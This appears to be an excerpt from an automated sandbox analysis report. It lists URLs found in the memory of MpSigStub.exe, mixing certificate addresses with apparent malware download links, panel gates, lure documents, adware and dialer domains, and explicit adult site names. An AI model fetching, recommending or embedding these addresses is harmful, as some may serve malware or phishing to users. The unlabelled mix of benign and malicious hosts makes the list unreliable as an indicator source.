Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://aapache.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://aartemis.com/?type=sc&ts=
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://abeidaman.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://abluefantasies.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://abraandthong.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://academiamylife.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://acayipbiri.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://acceso.masminutos.com
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://acetica.online/presently/refuge/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://acipatobo01.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
Source: MpSigStub.exe, 0000000B.00000003.18264122447.0000021B5ECAA000.00000004.00000001.sdmp String found in binary or memory: http://actionforfiletransferthroughcloudbusinessinternationalglobalsys.ydns.eu/business/business.doc
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://activecodec.0fees.net/codec/mp3/codec_download.htm
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://activedating.net
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://actresswallpaperbollywood.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://acutelogisticsltd.com/wp-content/themes/acutelogisticsltd/js/ie-emulation-modes-warning.js
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://ad.eltext.com
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://ad.tuzikmedia.biz
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://addictedtobash.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://ads.8866.org/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads.cgi?
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://ads.eorezo.com/cgi-bin/advert/getads?x_dp_id=
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://ads4.think-adz.com/xD
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://adsl.carpediem.fr/perl/invoc_oneway.pl?
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://adult-xxx-sex-porn-playboy.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://advancedcleaner.com
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp String found in binary or memory: http://advgoogle.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://adwpro.avelite.hop.clickbank.net/?mode=p
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://adyingtiger.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://aerytyre.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18316266171.0000021B5FBC6000.00000004.00000001.sdmp String found in binary or memory: http://aescripts.com
Source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp String found in binary or memory: http://ag.ru
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://agent.wizztrakys.com/csdi/wizzmonetize/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://agressor58.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.org
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://ahkscript.orgxw
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://ahmad-roni.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://aindonashi.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://ainsleywirefly.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://aircel3ghack.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://airsquirrels.com/
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://aitimatafb.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://ajustek.com.br/pt-br/clicks.php?
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://akdoganevdeneve.net/wp-content/Panel/gate.php
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://akrilikkapak.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://akusajaboys.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://alaihomestay.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://albaniaspace.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alert-ca.com/counter1/fout.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alerts.local/alert1.html
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://alexandrea-friesen16ka.ru.com/rocket.html
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alfaportal.com/c
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://alfredo.myphotos.cc/scripts/view.asp
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://casinotropez.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://catatanerwin.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://catatanfarhans.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://catell.ru/set.js
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://cc.advancedpccare.com/wcfCountryPricing/countrypricing.svc/GetCountryCode
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://ccc.avn12.cn/ccc/qqqccc/post.asp?i=77
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp String found in binary or memory: http://ccdelsur.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ccfairy.com/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://cdn.ap.bittorrent.com/control/tags/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://cdn.chatcdn.net
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://cdn.montiera.com/mntr/cmn/addonmsg.htmx
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://cdn.starter.fm/s/tuto4pc/ads/fr/startertv/player_tv.html?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cdn.zry97.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cdn.zry97.com/youxi
Source: MpSigStub.exe, 0000000B.00000003.18298478899.0000021B5EAB1000.00000004.00000001.sdmp String found in binary or memory: http://cdn.zry97.com/youxi/index_x
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://cdsa.xyz
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://cekirdekinanc.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://celebrity-nude-fuck.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://celebritybeefcake.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://celebs21mangap.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://chambahistory.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://chemgioaz.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://chistepordia.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://chutkiraani.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://chuyenquanaotreem.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://cicahroti.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://citw-vol2.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://cl.1ck.me/
Source: MpSigStub.exe, 0000000B.00000003.18320594233.0000021B5E399000.00000004.00000001.sdmp String found in binary or memory: http://clarityupstate.com/b.ocx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://clean.systemerrorfixer.com/MTg1MzE=/2/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://cleanwebsearch.com/?q=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://click.p4p.cn.yahoo.com/g
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp String found in binary or memory: http://client.aldtop.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://clientportal.download/123.php
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://clientportal.download/div.php
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://clients.lb1networks.com/upd.php?
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://clubdelaparrilla.cl/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://cnr.org.br/ups-quantum-view
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cns.3721.com/cns.dll?xC
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://completely-free-movies.info/2/?gen
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://consumerinput.com/privacy
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://coolpixhost.biz/rd/provider_license_v7.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://coolpixhost.biz/rd/provider_license_v7.php?
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://costacars.es/ico/ortodox.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/library/reportdhlnew.php
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 0000000B.00000003.18320877082.0000021B5E3DA000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 0000000B.00000003.18320877082.0000021B5E3DA000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://crl.defence.gov.au/pki0
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://d1hxtl9znqwejj.cloud
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://d2xpmajse0mo96.cloudfront.net/app/ver/ssl.php
Source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18300431925.0000021B5E6BC000.00000004.00000001.sdmp String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://default.home
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://demo.dokeos.com/courses/ERIC/work/
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://dev.northzone.it/ds/2312.gif
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://df20.dot5hosting.com/~shitshir
Source: MpSigStub.exe, 0000000B.00000003.18273001874.0000021B5F8E1000.00000004.00000001.sdmp String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
